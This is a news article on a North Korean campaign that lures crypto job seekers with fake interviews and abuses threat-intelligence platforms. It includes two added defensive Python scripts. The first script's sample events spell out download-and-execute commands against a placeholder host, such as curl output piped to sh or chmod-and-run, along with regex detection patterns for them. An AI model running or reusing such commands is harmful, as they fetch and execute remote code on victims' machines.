North Korean Hackers Exploit Cyber Intelligence Platforms to Evade Detection

In a revealing joint research effort, SentinelLabs and internet intelligence platform Validin have uncovered how North Korean threat actors are re-purposing defensive cyber tools to monitor and refine their malicious operations.

Released on 8 September 2025, the report details the "Contagious Interview" campaign, where Democratic People's Republic of Korea (DPRK)-aligned hackers use social engineering tactics to target job seekers in the cryptocurrency and blockchain sectors.

By abusing cyber threat intelligence (CTI) platforms, these actors detect exposure, explore and map new infrastructures, and sustain campaigns despite disruptions.

The findings highlight a sophisticated, team-based approach that prioritises rapid adaptation over comprehensive overhauls, impacting at least 230 victims between January and March 2025 - though the true figure is likely far higher.

Evolution Of The Contagious Interview Campaign

The Contagious Interview cluster, linked to the broader Lazarus group, has evolved into a persistent threat targeting professionals in high-value industries. According to the report, these actors impersonate legitimate companies like Archblock, Robinhood, and eToro, luring victims with fake job offers for roles such as Portfolio Manager or Senior Product Manager.

Victims, primarily in marketing and finance within cryptocurrency and blockchain firms, are geographically dispersed worldwide.

The campaign employs the ClickFix social engineering technique, in which targets are tricked into executing commands that download malware disguised as software updates or utilities. The malware is tailored to the victim's operating system and architecture - Windows, macOS or Linux. The report notes that engagement spans multiple stages, from completing phony skill assessments to initiating malware downloads via tools such as curl.
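The download-and-execute commands the article describes leave a recognisable shape in endpoint process telemetry: a command-line downloader whose output is either piped straight into an interpreter or written to disk and run in the same command line. The following detection logic is an added example written for this page, not code from the SentinelLabs/Validin report or from any vendor; the event records and hostnames are constructed, and the `SAMPLE_EVENTS` layout is a hypothetical simplification of what an EDR would export.

```python
"""Flag ClickFix-style download-and-execute command lines in process telemetry.

Added example for this article, not from the report. Event format is a
constructed stand-in for vendor EDR process-creation records.
"""
from __future__ import annotations

import re

# Constructed sample events: host, parent process, full command line.
SAMPLE_EVENTS = [
    {"host": "mac-01", "parent": "Terminal",
     "cmd": "curl -fsSL http://example.invalid/update.sh | sh"},
    {"host": "win-07", "parent": "powershell.exe",
     "cmd": "curl.exe -o C:\\Users\\Public\\driver.exe http://example.invalid/d && C:\\Users\\Public\\driver.exe"},
    {"host": "lin-03", "parent": "bash",
     "cmd": "curl -s https://example.invalid/x -o /tmp/x; chmod +x /tmp/x; /tmp/x"},
    {"host": "dev-02", "parent": "bash",
     "cmd": "curl -s https://api.github.com/repos/org/repo"},   # benign API call
    {"host": "dev-04", "parent": "bash",
     "cmd": "git pull origin main"},                              # no downloader at all
]

# Common command-line fetch tools across the three operating systems in scope.
DOWNLOADERS = re.compile(r"\b(curl(?:\.exe)?|wget|Invoke-WebRequest|iwr)\b", re.I)
# Remote content handed directly to a shell or scripting runtime.
PIPE_TO_INTERPRETER = re.compile(
    r"\|\s*(sh|bash|zsh|python3?|node|powershell(?:\.exe)?|iex)\b", re.I)
# Output-file flags for curl/wget/Invoke-WebRequest; group 1 is the written path.
OUT_FLAG = re.compile(r"(?:^|\s)(?:-o|-O|--output|-OutFile)\s+(\S+)", re.I)


def split_segments(cmd: str) -> list[str]:
    """Split a command line on the operators that chain separate commands."""
    return [s.strip() for s in re.split(r"&&|\|\||;", cmd) if s.strip()]


def classify(cmd: str) -> list[str]:
    """Return the reasons a command line looks like download-and-execute (empty if none)."""
    reasons: list[str] = []
    if not DOWNLOADERS.search(cmd):
        return reasons
    if PIPE_TO_INTERPRETER.search(cmd):
        reasons.append("remote content piped into an interpreter")
    segments = split_segments(cmd)
    for i, seg in enumerate(segments):
        if not DOWNLOADERS.search(seg):
            continue
        m = OUT_FLAG.search(seg)
        if not m:
            continue
        path = m.group(1).strip("'\"")
        # The downloaded path reappears in a later chained command (chmod/run).
        if path in " ".join(segments[i + 1:]):
            reasons.append(f"downloaded file {path} used again in the same command line")
    return reasons


def scan(events: list[dict]) -> list[tuple[str, str, list[str]]]:
    """Apply classify() to every event; return only the flagged ones."""
    hits = []
    for ev in events:
        reasons = classify(ev["cmd"])
        if reasons:
            hits.append((ev["host"], ev["cmd"], reasons))
    return hits


if __name__ == "__main__":
    for host, cmd, reasons in scan(SAMPLE_EVENTS):
        print(f"{host}: {cmd}\n    -> {'; '.join(reasons)}")
```

The first pattern is noisy on developer workstations, so in production the parent process (a terminal spawned by a browser or a chat client is far more interesting than a CI runner) and the URL's reputation would be added as scoring inputs rather than hard filters.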

SentinelLabs and Validin observed this activity intensifying after Validin's 11 March 2025 blog post on Lazarus infrastructure. Within 24 hours, threat actors registered multiple Validin community accounts using tracked Gmail addresses, such as info@versusx.us. Although most were blocked, one was deliberately left active for monitoring, revealing coordinated efforts across teams.

Abusing CTI Platforms For Operational Resilience

A key revelation is how DPRK actors repurpose CTI platforms - intended for defenders - to their advantage. Platforms like Validin, VirusTotal, and Maltrail are used to query infrastructure artifacts, detecting signs of exposure. The report describes real-time collaboration, with indicators suggesting use of Slack for coordinating investigations.

Despite identifying detectable artifacts, the actors implement only sporadic, limited changes. For instance, they might alter specific domain names or server configurations but avoid large-scale modifications. Instead, they focus on rapidly deploying new infrastructure following takedowns by service providers.

This strategy reflects a pragmatic approach: maintaining operational tempo amid high victim engagement rates.

The report attributes this to internal factors within North Korea's cyber operations. Decentralised command structures and resource constraints limit coordinated updates. Moreover, annual revenue quotas imposed by the regime foster competition among teams, incentivising operatives to protect their own assets rather than collaborate on broad changes. As a result, actors prioritise replacing disrupted infrastructure to meet targets and sustain revenue generation through stolen cryptocurrencies.

OPSEC Failures In Infrastructure Management

Threat actors also use CTI platforms to evaluate potential new assets before acquisition. On 25 March 2025, the monitored account queried domains like hiringassessment.net and skillquestions.com - names aligned with recruitment themes - shortly before registering them. This scouting aims to avoid acquiring assets that have already been flagged as malicious, reducing the risk of detection after deployment. Monitoring continues throughout the asset's lifecycle, with periodic checks until takedown.

However, the report exposes significant operational security (OPSEC) lapses during deployment.

Servers like api.release-drivers.online inadvertently exposed web root directories, Node.js error logs, and usernames such as relefmwz, revealing deployment timelines. Other servers, including api.camdriverhelp.club and api.drive-release.cloud, leaked ContagiousDrop applications and victim logs, providing unintended insights into operations.

The Role of ContagiousDrop In Tracking Victims

Central to the campaign is ContagiousDrop, a Node.js application (app.js) deployed on malware distribution servers. It handles HTTP requests, delivering OS-specific payloads while logging interactions. Features include an email notification system, sending alerts from addresses like designedcuratedamy58@gmail.com when victims engage - such as starting assessments or downloading files.

Logs build a detailed victim database, recording names, emails, IP addresses, phone numbers, and interaction dates in files like client_ips_start_test.json. Analysis of these logs from January to March 2025 identified over 230 engagements, though the logs covered only a few servers. Victims' profiles confirm targeting of crypto experts, with logs also showing internal testing using aliases like Richard Davis and Lazaro - likely referencing Lazarus.

Defensive Recommendations

The report demonstrates how attackers are using defenders' tools against them, challenging the cybersecurity community to adapt. DPRK groups, including ScarCruft, have shown prior interest in CTI, even developing malware to target researchers in 2024. This abuse reveals operational plans, enabling better tracking despite expected adaptations.

To counter this, organisations should scrutinise job offers, verify communications, and implement robust endpoint security. CTI providers must enhance account verification and monitor suspicious queries.
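Two of the behaviours the article reports are directly auditable from a CTI platform's own records: accounts created with already-tracked contact addresses in the hours after a public report, and queries for domains that did not exist yet but were registered shortly afterwards. The following retrospective check is an added example for this page, not code from Validin, SentinelLabs or any platform; every address, account id, domain and timestamp in it is constructed, and `WHOIS_CREATED` stands in for a registration-date lookup the platform would have to provide.

```python
"""Retrospective abuse signals for a CTI platform's account and query logs.

Added example, not from the report or any platform. All data is constructed.
"""
from __future__ import annotations

from datetime import datetime, timedelta

# Addresses previously tied to actor infrastructure (constructed, .invalid TLD).
TRACKED_EMAILS = {"actor-contact@example.invalid"}
# Date a public report on the actor's infrastructure went live (constructed).
PUBLICATION = datetime(2025, 3, 11)

# Account-registration feed (constructed).
REGISTRATIONS = [
    {"account": "acct-1", "email": "actor-contact@example.invalid",
     "ts": datetime(2025, 3, 11, 15, 0)},
    {"account": "acct-2", "email": "analyst@corp.example",
     "ts": datetime(2025, 3, 12, 9, 0)},
]
# Per-account query log (constructed).
QUERIES = [
    {"account": "acct-1", "indicator": "newlure.example", "ts": datetime(2025, 3, 25, 10, 0)},
    {"account": "acct-1", "indicator": "oldlure.example", "ts": datetime(2025, 3, 25, 10, 5)},
    {"account": "acct-2", "indicator": "oldlure.example", "ts": datetime(2025, 3, 26, 11, 0)},
]
# Hypothetical WHOIS creation dates; a domain absent here was never registered.
WHOIS_CREATED = {
    "newlure.example": datetime(2025, 3, 27),   # registered two days after the query
    "oldlure.example": datetime(2024, 6, 1),    # long-lived, nothing unusual
}


def flag_registrations(regs, tracked, published, window=timedelta(hours=24)):
    """Accounts created with a tracked address inside `window` after publication."""
    return [r["account"] for r in regs
            if r["email"].lower() in tracked
            and published <= r["ts"] <= published + window]


def flag_scouting(queries, whois, horizon=timedelta(days=14)):
    """Queries for domains that were unregistered at query time but created within `horizon`."""
    hits = []
    for q in queries:
        created = whois.get(q["indicator"])
        if created is None:
            continue                      # never registered: not scouting by this rule
        if q["ts"] < created <= q["ts"] + horizon:
            hits.append((q["account"], q["indicator"]))
    return hits


def account_risk(regs, queries, whois, tracked, published) -> dict[str, list[str]]:
    """Combine both signals into a per-account list of reasons for review."""
    risk: dict[str, list[str]] = {}
    for acct in flag_registrations(regs, tracked, published):
        risk.setdefault(acct, []).append(
            "registered with a tracked address within 24h of publication")
    for acct, domain in flag_scouting(queries, whois):
        risk.setdefault(acct, []).append(f"queried {domain} before it was registered")
    return risk


if __name__ == "__main__":
    for acct, reasons in account_risk(REGISTRATIONS, QUERIES, WHOIS_CREATED,
                                      TRACKED_EMAILS, PUBLICATION).items():
        print(acct, "->", "; ".join(reasons))
```

Neither signal is conclusive on its own (a researcher may well query a domain that a squatter registers a week later), which is why the output is a list of reasons for an analyst rather than an automatic block; the article's own account of leaving one account active for monitoring is the same trade-off.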

The report advocates sharing intelligence to empower defences, outweighing the risks of alerting actors. As North Korean cyber threats escalate, collaborative efforts like this joint investigation are crucial for disrupting campaigns and protecting vulnerable sectors.

This research not only exposes DPRK tactics but calls for heightened vigilance in an era where intelligence tools are double-edged swords.

SentinelOne | Infosecurity Magazine | IBM/XForce | Security Week | gbhackers | CyberSixt

Image: Ideogram
